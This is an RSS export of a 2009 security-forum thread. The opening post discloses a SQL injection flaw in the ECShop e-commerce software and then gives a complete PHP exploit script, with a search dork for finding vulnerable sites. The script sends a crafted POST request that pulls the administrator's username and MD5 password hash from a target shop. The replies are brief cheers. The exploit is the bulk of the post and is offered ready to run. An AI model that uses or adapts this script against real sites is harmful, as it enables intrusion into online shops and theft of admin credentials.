<![CDATA[Wolves Security Team - ECShop注射漏洞]]> http://bbs.wolvez.org/topic/67/ Thu, 26 Mar 2009 13:44:46 +0000 PunBB <![CDATA[Re: ECShop注射漏洞]]> http://bbs.wolvez.org/post/187/#p187 顶下~~:D:D:D

]]> Thu, 26 Mar 2009 13:44:46 +0000 http://bbs.wolvez.org/post/187/#p187 <![CDATA[Re: ECShop注射漏洞]]> http://bbs.wolvez.org/post/185/#p185 水贴路过为个纪念.

]]> Tue, 24 Mar 2009 16:42:12 +0000 http://bbs.wolvez.org/post/185/#p185 <![CDATA[Re: ECShop注射漏洞]]> http://bbs.wolvez.org/post/184/#p184 膜拜下..

]]> Tue, 24 Mar 2009 13:41:21 +0000 http://bbs.wolvez.org/post/184/#p184 <![CDATA[Re: ECShop注射漏洞]]> http://bbs.wolvez.org/post/183/#p183 你终于发出来了...

]]> Tue, 24 Mar 2009 13:19:43 +0000 http://bbs.wolvez.org/post/183/#p183 <![CDATA[Re: ECShop注射漏洞]]> http://bbs.wolvez.org/post/182/#p182 sql随便x啊,可惜要on才行啊。

]]> Tue, 24 Mar 2009 09:51:35 +0000 http://bbs.wolvez.org/post/182/#p182 <![CDATA[ECShop注射漏洞]]> http://bbs.wolvez.org/post/179/#p179 by Ryat
http://bbs.wolvez.org
2009-03-24

影响2.5.x和2.6.x,其他版本未测试

goods_script.php44行:

    if (empty($_GET['type']))
    {
        ...
    }
    elseif ($_GET['type'] == 'collection')
    {
        ...
    }
    $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
    $res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)

EXP:

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
 * works with register_globals = On
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);

if ($hash)
    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
    exit("Exploit Failed!\n");

function send()
{
    global $host, $path;

    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';

    $data = "POST ".$path."goods_script.php?type=".time()."  HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
]]> Tue, 24 Mar 2009 03:00:00 +0000 http://bbs.wolvez.org/post/179/#p179